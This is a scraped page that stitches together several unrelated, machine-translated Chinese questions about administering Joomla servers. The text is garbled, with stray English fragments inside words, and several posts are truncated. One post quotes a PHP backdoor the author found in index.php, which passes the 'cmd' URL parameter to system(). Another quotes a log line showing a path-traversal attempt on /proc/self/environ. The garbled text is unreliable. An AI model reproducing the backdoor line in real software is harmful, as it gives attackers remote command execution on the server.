我的问题是相当一般的。 让我们假设我有一个Linux分布式Web服务器, /var/www/是Web目录。 我用我的超级用户帐户上传和解压缩Joomla安装.zip文件夹。 Web用户的Linux系统用户称为www-data 。 无论如何,我的问题是谁应该是Linux系统中的文件的ONWER? 现在,因为我用我的超级用户帐户来解压文件,所有的文件夹和文件都由超级用户拥有,因此在joomlapipe理系统中是不可写的。 我只是有点犹豫,将www-data用户设置为文件的所有者。 这个可以吗? 仅供参考,在Linux中,我将更改chown的文件夹和文件的所有者,并使用chgrp更改组。 谢谢!
我非常需要帮助。 我的网站现在几乎不可能使用,因为我的服务器负载很大。 我已经晚了一个月的抵押贷款,这真的没有帮助我的情况。 我一直在努力解决这个间歇性负载问题几个月(从来没有这么糟糕)。 由于我在DDOS攻击下,我怀疑是某种攻击! 我一直在想弄清楚是什么导致了负载,但我恐怕只是没有经验或知识去理解我一直在看的所有数据。 我甚至不知道从哪里开始或如何testing大量的攻击。 这里有一些你可能会觉得有用的数据 服务器:Xeon X3220四核2.4 GHz – Linux,FreeBSD 500 GB HD和8 Gig Ram。 运行Centos版本5.7服务器版本:Apache / 2.2.21(Unix)mod_ssl / 2.2.21 OpenSSL / 0.9.8e-fips-rhel5 mod_auth_passthrough / 2.1 mod_bwlimited / 1.4 FrontPage / 5.0.2.2635 mod_qos / 9.74 警告:所有的网站都是中等成年人的网站 – 主要是像精灵和亚马逊的幻想艺术。 1)网站可能会运行良好的几个星期或只有几天不到10负载,然后开始跳到40-80负载 – 不知道为什么。 相同的网站,相同的MODS,相同的stream量 – 只是WHAM! 2)几乎每天都会收到一封电子邮件,内容是:“来自IP的失败login尝试次数(每次都不一样)”。 我的networking主机(几乎从来没有帮助过我)告诉我这是一个udp洪水或什么的。 3)我已经改变了默认的MySQL的端口。 如果我把它恢复到默认值 – 我得到超过100的负载必须是一个恒定的MySQL端口洪水。 4)我重新configurationMYSQL。 链接: […]
大多数CMS(例如Joomla php mail()默认使用php mail() ,如果需要,可以select将其更改为SMTP 。 我将在Debian 7的同一VPS中设置networking服务器和邮件服务器(Postfix)。我想了解的是: 交付声誉:将使用PHP邮件()与SMTP有什么区别的交付率? 据我所知,Postfix将在传送电子邮件时与互联网上的其他服务器进行通信时使用SMTP协议,因此可以安全地假设,如果电子邮件是通过php邮件发送到postfix还是从本地主机smpt发送? 这两种方法中的任何一种对电子邮件信誉的影响是否有影响? 性能负载:发送邮件时,php邮件和SMTP之间是否有任何性能差异? 假如我发送的电子邮件数量是10000个,那么哪种方法会占用最多的资源(或时间)呢? 我的假设是,这两个可以花费一点时间,如:PHP邮件编译电子邮件头等,和SMTP每次进行连接。 哪一个消耗最多的服务器资源? 安全问题:当我search这两者之间的区别时,许多网站说,与PHP邮件的安全问题,因为黑客可以上传PHP脚本发送垃圾邮件。 但是我也可以看到SMTP的另一个安全问题,因为SMTP用户名和密码都以configuration文件的forms存储在不安全的文本中。 既然这两种方法都存在安全问题,那么在任何方面都比另一种权重要好吗? 首选项:如果我可以在我的服务器上同时设置phpmail和SMTP,那么我是否应该为了某种原因而优先使用一个呢? 我的意思是,如果我可以在我的服务器中使用SMTP,那么我应该尝试使用SMTP而不是phpmail吗? 背景:我的机器将成为一个简单的networking服务器,使用postfix来发送来自Joomla的邮件,通讯和根邮件从各种服务。
当我安装joomla我看不到index.php ,我得到这个消息在我的/var/log/apache2/error.log [notice] child pid 3211 exit signal Segmentation fault (11) 为了激活Coredump,我按照这个链接中的指示 CoreDumpDirectory /tmp/apache2-gdb-dump # added this to /etc/apache2/apache2.conf mkdir -p /tmp/apache2-gdb-dump chown www-data: /tmp/apache2-gdb-dump chmod 0777 /tmp/apache2-gdb-dump /etc/init.d/httpd restart 但是我在coredumpdirectory没有看到任何东西 ls /tmp/apache2-gdb-dump 我可以看到joomla的localhost/administrator ,但不是localhost/index.php 。
我运行了几个托pipe服务器,最近我经历了很多针对joomla的网站的暴力攻击。 攻击者似乎试图对administrator/index.php页面bruteforce。 当他们尝试使用以下规则集强制Wordpresslogin时,我通常会lockingIP: SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000134 <Locationmatch "/wp-login.php"> SecRule ip:bf_block "@gt 0" "deny,status:401,log,id:5000135,msg:'ip address blocked for 5 minutes, more than 10 login attempts in 3 minutes.'" SecRule RESPONSE_STATUS "^302" "phase:5,t:none,nolog,pass,setvar:ip.bf_counter=0,id:5000136" SecRule RESPONSE_STATUS "^200" "phase:5,chain,t:none,nolog,pass,setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180,id:5000137" SecRule ip:bf_counter "@gt 10" "t:none,setvar:ip.bf_block=1,expirevar:ip.bf_block=300,setvar:ip.bf_counter=0" </Locationmatch> 但是我找不到Joomla!的类似规则,因为响应状态是“303见其他”,有效的密码和无效的密码。 任何帮助? 提前致谢!
我运行的Joomla网站前几天被黑了。 黑客把一些文件放到了tmp目录下,并在那里运行了一个HTTP守护进程(至less这是我的主机告诉我的)。 无论如何,我一直在努力清理他们留下的文件,并确保我能做到,但在检查我的日志时,我注意到了www.domain.com/?cmd=ls上的一个命中。 这对我来说似乎很奇怪,所以我试了一下……并且注意到它列出了我站点根目录下的所有文件。 有人可以向我解释为什么发生这种情况,我怎么阻止它? 这似乎是一个巨大的利用,我想立即消除。 更新 :在挖掘我注意到一些额外的行添加到我的Joomla index.php: if ($_GET['cmd']!=null) { system($_GET['cmd']); } 我已经删除了这些内容,但是很想知道攻击者是如何设法编辑这些内容的。 不确定在哪里看,以确保我closures了任何后门。 更新更新 :首先让我说,是的,我意识到在这里采取正确的行动是把网站吹走并从备份恢复。 不过,我宁愿把它作为最后的手段,因为(一)这是一个网站,取决于社区的贡献,我的备份不是最近(我的错,我知道)和(二)我正在一个新的版本,应该很快就绪。 但是因为我似乎在这里得到了一些帮助,所以我会添加一些我发现/为了解决这种情况而做的其他事情。 在我的/ tmp文件夹中发现了一些.kin(或者类似的东西 – 没有记下来并且马上删除它)目录,显然这个http守护进程从哪里运行。 我假设gunzip(下面提到)是这样放在这里的。 在我的error_log文件中,我发现以下可疑条目(“…”是我尝试从这个post中删除path/文件名): [04-Jul-2010 09:45:58] PHP Fatal error: Class 'CkformsController../../../../../../../../../../../../../../../proc/self/environ' not found in … on line 24 [05-Jul-2010 12:31:30] PHP Notice: Undefined index: HTTP_USER_AGENT in … on line 92 [04-Jul-2010 06:41:52] PHP […]
我负责使用Joomla创build一个Web服务器和Intranet站点,以创build一个微软Sharepoint的替代scheme,并且希望得到一些关于如何开始的步骤以及如何开始的build议。 有一点背景是,我们使用了我们的SBS服务器附带的Sharepoint,并已迁移到Server 2003,并希望有一个解决scheme可以免费或成本的一小部分可以Sharepoint的。 理想情况下,我们希望它成为员工使用内部新闻的最新时间,有一个日历,并链接到存储的文件,如SOP(标准操作程序)。 我希望这个解释好一点,对于我的第一篇文章中如此不清楚,感到抱歉!